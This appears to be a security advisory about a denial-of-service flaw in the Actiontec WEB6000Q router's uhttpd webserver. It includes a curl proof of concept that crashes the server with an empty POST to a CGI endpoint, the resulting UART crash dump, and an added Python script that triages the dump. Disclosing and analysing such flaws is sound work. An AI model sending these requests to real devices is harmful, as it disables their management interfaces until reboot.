### Device Details

Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22
Reported: July 2018
CVE: Not needed since update is pushed by the provider.

### Summary of Findings

Querying CGI endpoints with empty (GET/POST/HEAD) requests causes a segmentation fault in the uhttpd webserver. Since there is no watchdog on this daemon, a device reboot is needed to restart the webserver before any modification can be made to the device.

### Proof of Concept:

```
$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (52) Empty reply from server
$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused
```

### UART console output after attack:

```
<4>[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[ 726.583000]
<4>[ 726.585000] Cpu 1
<4>[ 726.587000] $ 0 : 00000000 10008d00 00000000 00000000
<4>[ 726.592000] $ 4 : 00000000 00000000 00000000 00000000
<4>[ 726.598000] $ 8 : 81010100 3d3d3d3d 77a00000 f0000000
<4>[ 726.603000] $12 : 00000001 6570743a 202a2f2a 00416b5c
<4>[ 726.608000] $16 : 00000000 00000000 00000000 7fe14ebe
<4>[ 726.614000] $20 : 00404c84 775168a0 0046d470 0084ee6c
<4>[ 726.619000] $24 : 00000186 00411030
<4>[ 726.624000] $28 : 00464620 7fe12800 7fe12800 00416c20
<4>[ 726.630000] Hi : 000000c9
<4>[ 726.633000] Lo : 0001e791
<4>[ 726.636000] epc : 00411078 0x411078
<4>[ 726.640000] Tainted: P
<4>[ 726.643000] ra : 00416c20 0x416c20
<4>[ 726.647000] Status: 00008d13 USER EXL IE
<4>[ 726.652000] Cause : 00000008
<4>[ 726.655000] BadVA : 00000000
<4>[ 726.657000] PrId : 0002a080 (Broadcom BMIPS4350)
<4>[ 726.663000]
<4>[ 726.663000] Userspace Call Trace: process uhttpd, pid 452, signal 11
<4>[ 726.671000] [<00411078>] /sbin/uhttpd
<4>[ 726.674000] [<00416c20>] /sbin/uhttpd
<4>[ 726.678000] [<00416d68>] /sbin/uhttpd
<4>[ 726.682000] [<00407cd4>] /sbin/uhttpd
<4>[ 726.686000] [<00416c20>] /sbin/uhttpd
<4>[ 726.689000] [<0047cb94>] (unknown)
```
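For triage, the UART dump above can be reduced to a verdict by decoding the MIPS `Cause` and `BadVA` registers. The following is an added example, not part of the original advisory or the vendor's code; the function names `parse_crash` and `classify` and the 4096-byte page size are assumptions, and the sample is a subset of the log lines above.

```python
import re

# Sample input: a subset of the UART lines quoted in the advisory above.
SAMPLE = """\
<4>[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[ 726.636000] epc : 00411078 0x411078
<4>[ 726.643000] ra : 00416c20 0x416c20
<4>[ 726.652000] Cause : 00000008
<4>[ 726.655000] BadVA : 00000000
<4>[ 726.671000] [<00411078>] /sbin/uhttpd
<4>[ 726.674000] [<00416c20>] /sbin/uhttpd
"""

# MIPS32 Cause.ExcCode (bits 6..2 of Cause) values that indicate memory faults.
EXC_CODES = {1: "TLB modification", 2: "TLB miss on load/fetch", 3: "TLB miss on store",
             4: "address error on load/fetch", 5: "address error on store"}

def parse_crash(log):
    """Extract the faulting process, key registers and call trace from the dump."""
    info = {"frames": []}
    for line in log.splitlines():
        body = re.sub(r"^<\d+>\[\s*[\d.]+\]\s*", "", line)  # drop "<4>[ 726.578000] "
        m = re.match(r"(\S+)/(\d+): potentially unexpected fatal signal (\d+)", body)
        if m:
            info.update(process=m.group(1), pid=int(m.group(2)), signal=int(m.group(3)))
            continue
        m = re.match(r"(epc|ra|Cause|BadVA)\s*:\s*([0-9a-fA-F]{8})", body)
        if m:
            info[m.group(1).lower()] = int(m.group(2), 16)
            continue
        m = re.match(r"\[<([0-9a-fA-F]{8})>\]\s+(\S+)", body)
        if m:
            info["frames"].append((int(m.group(1), 16), m.group(2)))
    return info

def classify(info, page_size=4096):
    """Turn the raw registers into a triage verdict (page_size is an assumption)."""
    exc = (info["cause"] >> 2) & 0x1F
    access = "write" if exc in (1, 3, 5) else "read"
    near_null = info["badva"] < page_size          # fault address in the zero page
    verdict = f"NULL-pointer {access}" if near_null else f"invalid {access}"
    return {"exception": EXC_CODES.get(exc, f"ExcCode {exc}"), "verdict": verdict,
            "data_access": info["epc"] != info["badva"],   # not a jump to a bad address
            "epc_in_trace": bool(info["frames"]) and info["frames"][0][0] == info["epc"]}
```

For this dump the result is a NULL-pointer read at `epc` 0x411078 inside `/sbin/uhttpd`, which is consistent with the daemon dereferencing a missing request field when the request is empty.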